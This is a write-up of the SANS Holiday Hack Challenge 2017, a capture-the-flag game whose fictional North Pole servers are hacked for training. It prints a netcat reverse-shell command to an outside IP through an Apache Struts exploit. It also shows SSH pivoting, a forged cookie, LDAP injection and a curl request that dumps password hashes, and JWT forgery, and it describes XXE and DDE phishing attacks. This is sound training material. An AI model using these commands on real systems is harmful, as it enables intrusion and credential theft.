SANS Holiday Hack 2017 Writeup
The following is my writeup for The SANS Holiday Hack Challenge of 2017. I took my time with it this year, playing casually throughout the holiday season and had a great time. The scoreboard dosn’t take into account of when people completed the challenges, which put me in a tie for first that I thought was pretty cool. In the following article I will go over 8 Cranberry Pi challenges, the 9 questions of The Story, and a writeup of hacking the snowball physics games. All that said, this is a pretty long writeup filled w/ tons of screenshots, so I hope you enjoy. I also want to give a big shout out to FADEC0D3 and point to his writeup, as he was one of the first people to complete HHC, a huge help to me personally, and his post came out beautiful in the markdown format.
Cranberry Pis
Once you get in the game, there are multiple levels that involve a physics engine and rolling a ball around a map to hit several points along the way. Along w/ these games, each level contains a “Cranberry PI”, which is a hacking challenge that upon completion gives you new abilities in the snowball game and hints to the 9 Story questions. First, I solved all of the “Cranberry PIs” and snowball games before diving into the 9 questions from The Story.
Winder Wonder Landing / Bushy Evergreen
The goal of this challenge is to find a binary named elftalkd and run it. Our normal “find” command is for the wrong system archatecture, however we can locate another “find” command and use this.
Cryokinetic Magic / Holly Evergreen
In this challenge one needs to run a binary which they have read access to, but not execute access. We can move this file into tmp and call it with ld-linux.so2 command.
There's Snow Place Like Home / Pepper Minstix
In this challenge we need to run an Arm binary on intel x86_64 system, which can be done using the qemu-arm emulation tool.
Cliffs of Winsanity / Sparkle RedBerry
In this challenge one needs to kill a running process, however there is an alias set that prevents one from running the command without the full path.
Bumbles Bounce / Minty CandyCane
This challenge is all about parsing and sorting web access logs to find the least common browser user-agent.
I Don’t Think We’re In Kansas Anymore / Sugarplum Mary
In this challenge one needs to query a sqlite database to the most liked song across two tables.
Oh Wait! Maybe We Are… / Shinny Upatree
In this challenge one can run the find command as a privileged user, and needs to use this to restore a shadow file they normally can’t write.
We’re Off To See The / Wunorse Openslae
In this challenge one needed to an LD_Preload command to highjack the rand() function.
The Story Questions
This part involved answering several questions asked in the story, which ultimately involved exploiting a public server and pivoting into an internal network to further hack servers on that internal network.
1 ✓
Q1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?
A1) About This Book ...
First page is located at:
https://www.holidayhackchallenge.com/2017/pages/6dda7650725302f59ea42047206bd4ee5f928d19/GreatBookPage1.pdf
First page is located at:
https://www.holidayhackchallenge.com/2017/pages/6dda7650725302f59ea42047206bd4ee5f928d19/GreatBookPage1.pdf
One gets this link by simply rolling over The Great Book page in the game. There is another level where you have to pick up a Great Book page this way as well.
2 ✓
Q2a) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server?
A2a) On the topic of Flying Animals
Q2b) What is Alabaster Snowball's password?
A2a) On the topic of Flying Animals
Q2b) What is Alabaster Snowball's password?
A2b) Alabaster_snowball : stream_unhappy_buy_loss
Investigating the host l2s takes us to a dev page which is vulnerable to an Apache Struts exploit: https://www.exploit-db.com/exploits/42627/
Running the following command puts us on the box (once we have our listening post set up):
Running the following command puts us on the box (once we have our listening post set up):
python 42627.py https://dev.northpolechristmastown.com/orders/1708 "nc -e /bin/bash 13.37.9.246 7777"
Got a shell!
Once on the box we can investigate local files in the web root and we find a file that contains Alabster’s password:
Moving forward one can use alabster’s UN and PW to log into the box with SSH, instead of our Apache struts exploit.
3 ✓
Q3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
A3) FileStor
One can run a scan through the ssh bastion for SMB servers on the internal network:
alabaster_snowball@l2s:/tmp/asnow.eG04WwYgkRFZ50HlgBKBiFv8$ nmap -sV -sC -Pn -n -p445 10.142.0.0/23
Which give you the following edited scan results:
10.142.0.7
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_nbstat: NetBIOS name: HHC17-EMI, NetBIOS user: , NetBIOS MAC: 42:01:0a:8e:00:07 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Using SSH, one can set up a socks proxy to pivot through the bastion, then we can connect to the SMB servers using localhost:
sudo ssh -L :445:10.142.0.7:445 alabaster_snowball@dev.northpolechristmastown.com
Then all one needs to do is list out everything the current user has access to:
smbmap -H 127.0.0.1 -R -u alabaster_snowball -p stream_unhappy_buy_loss
Followed by downloading all of the files in the share:
smbget -R -U alabaster_snowball smb://127.0.0.1/FileStor/
4 ✓
Q4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
A4) Munchkins formed the Lollipop Guild and have Munchkin moles infiltrating the North Pole.
I started this challenge by scanning the mail server:
This led me to the webserver on port 3000, and while browsing this page I also gleaned the email format:
Browsing to mail.northpolechristmastown.com/cookie.txt brings one to this page which describes how the cookies are generated:
Running that code w/ no plaintext and truncating it to 16 bytes gives one the following cookie, which lets you login as alabaser:
'{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"Iyn4VsDfzqw0VSUI5zBE6g"}'
Once we set our cookie to this, we are logged in as Alabaster, and going through his mailbox, reveals the Great Book page:
5 ✓
Q5a) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List?
A5a) 4 separate infractions, regardless of severity, date, or status.
Q5b) What are the names of at least six insider threat moles?
A5b) Boq Questrian, Bini Aru, Beverly Khalil, Manuel Graham, Charmaine Joseph, Wesley Morton.
Q5c) Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?
A5c) Abominable Snow Monster, found in our conversation w/ Sam.
Using the sheets we found in the SMB drive compared to the data hosted on the nppd site:
We can use the Naughty and Nice List to select Naughty individuals and look them up in in the nppd system. Similarly, one can do this with Nice individauls, and patern emerges quickly. Naughty individuals have far more infractions (regardless of severity, date, or status). To find more moles one can use the two provided in the BOLO report, to look up other people with the same infractions of throwing rocks and pulling hair. This gives a bunch of potential moles, however I picked a few that jumped out to me as Munchkins. Finally, we find out who has been throwing the snowballs in our first NPC conversation with Sam and Bumble.
6 ✓
Q6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
A6) The Dreaded Inter-Dimensional Tornadoes.
Navigating to the EaaS server one can tell it is an IIS server, which alludes to the hint regarding XXE in IIS. The server lets one download the elf list, reset it, and upload a new XML with elf info inside.
One can upload an XML that points to a remote DTD file:
The remote DTD payload reads a local file and posts that back to the remote webserver.
Giving us the page!
7 ✓
Q7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
A7) The Witches of Oz! After the great schizim no witches have gone to the North Pole.
To start this challenge one needs to log back into the mail server. Once there, you can search alabster’s email for an email from Jessica Clause regarding a cookie reciepie he would open no matter what. Sounds like the perfect oppertunity to phish alabster. Logged into the mail server as Jessica.Claus@northpolechristmastown.com by generating a new cookie for her.
We will be sending the email titled: “gingerbread cookie recipe”, from Jessica.
For the payload we will use an MSWord DDEAUTO attack, as opposed to a more traditional MSWord macro attack:
Which gives us a reverse shell and access to the system:
8 ✓
Q8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
A8) The Wizard of Oz
Again you set up the SOCKS proxy and browse to localhost:8080, and see both a login portal and a password reset location. You need to xss the following value: localStorage.getItem(“np-auth”)
One can use this payload to send the np-auth value to our webserver:
One can use this payload to send the np-auth value to our webserver:
Getting the result:
AKA
35.196.239.128 - - [30/Dec/2017:00:14:15 +0000] "GET /?cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 331 "http://127.0.0.1/reset_request?ticket=4IH2X-CPZX0-5XF12-JWFBA" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
This is a jwt token, which can be decoded easily, but can’t be changed without cracking the secret used to generate the hash. However, one can crack this jwt token to get the password:
Now we need to use this cracked tokwn password to forge our own tokens: 3lv3s
Changing the expiration date, creating a new jwt token, and signing it with the password gives us our new jwt token.
One can set this jwt token with Javascript to get logged into the app:
localStorage.setItem('np-auth', "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco”);
Once logged into the app, it becomes apparent that it’s an LDAP search utility. Next one can perform LDAP inject in the application to reveal people in ldap like the Clauses, who by default you can’t search for. Using the ldapi query from the SANS article:
))(department=it)(|(cn=
Which lists out the Claus’:
Now one can forge a new token with the Claus’ ldap data and a new expiration date:
This lets one auth as Santa Claus and choose the Santa Panel option, but then you are presented w/ a Santa password prompt. Turning the previous LDAP injection to a curl request, and adding the attribute for userPasswords, dumps all of the user hashes from AD:
curl 'http://localhost:8080/search' -H 'Host: localhost:8080' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://localhost:8080/home.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'np-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJvdSI6ImNsYXVzIiwiZXhwaXJlcyI6IjIwMTgtMDgtMTYgMTI6MDA6NDcuMjQ4MDkzKzAwOjAwIiwidWlkIjoic2FudGEuY2xhdXMifQ.RA0Tx0E9R2vEv4depfPzm2d_ZH2_wzoYfDtFQAmtC9c' -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' --data 'name=))(department%3Dit)(%7C(cn%3D&isElf=True&attributes=uid%2CuserPassword'
Focusing on just Santa’s hash:
["cn=santa,ou=human,dc=northpolechristmastown,dc=com",
{
"uid": ["santa.claus"],
"userPassword": ["d8b4c05a35b0513f302a85c409b4aab3"]
}
]
To crack this hash one can use the SANS reverse hash lookup we get the pw: https://isc.sans.edu/tools/reversehash.html
md5 hash d8b4c05a35b0513f302a85c409b4aab3 = 001cookielips001
Using this password in the Santa Panel reveals a letter to Santa from The Wizard of Oz:
9 ✓
Q9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
A9) Glinda, the Good Witch
After collecting 5 of the 7 pages from the Great Book, and completing all of the snowball rolling levels, one unlocks the second npc conversation, with Glinda confessing her evil plan.
Hacking the Snowball Game Maps
Looking at the vendor.js in the browser debugger one can throw a debug point on line 11293, where you can see the following values:
key: "getDropper" : #getDropper
Once this break point is triggered, run the following command in the javascript console:
this.scene.debugLayer.show()
Following that, resume the execution of scripts on the page. Which displays the debug console:
This debug console lets us manipulate the objects however we want, including moving waypoints and seeing through certain objects.
Done! The following is my achievements bar, showing I completed all of the scoreable events in the game and had a great time along the way:
The weeks leading up to SANS Holiday Hack there were tweets by Ed Skoudis and SANS, many of which were directly applicable in the CTF itself. I used most all of these links throughout the challenge, and have included the links at the end of the article for reference.
SQL Stuff:
https://pen-testing.sans.org/blog/2017/12/09/your-pokemon-guide-for-essential-sql-pen-test-commands/
https://pen-testing.sans.org/blog/2017/12/09/your-pokemon-guide-for-essential-sql-pen-test-commands/
XXE in IIS:
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
LD_Preload:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
Tinkering w/ Public Exploits:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
Web Based LDAP Exploitation:
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap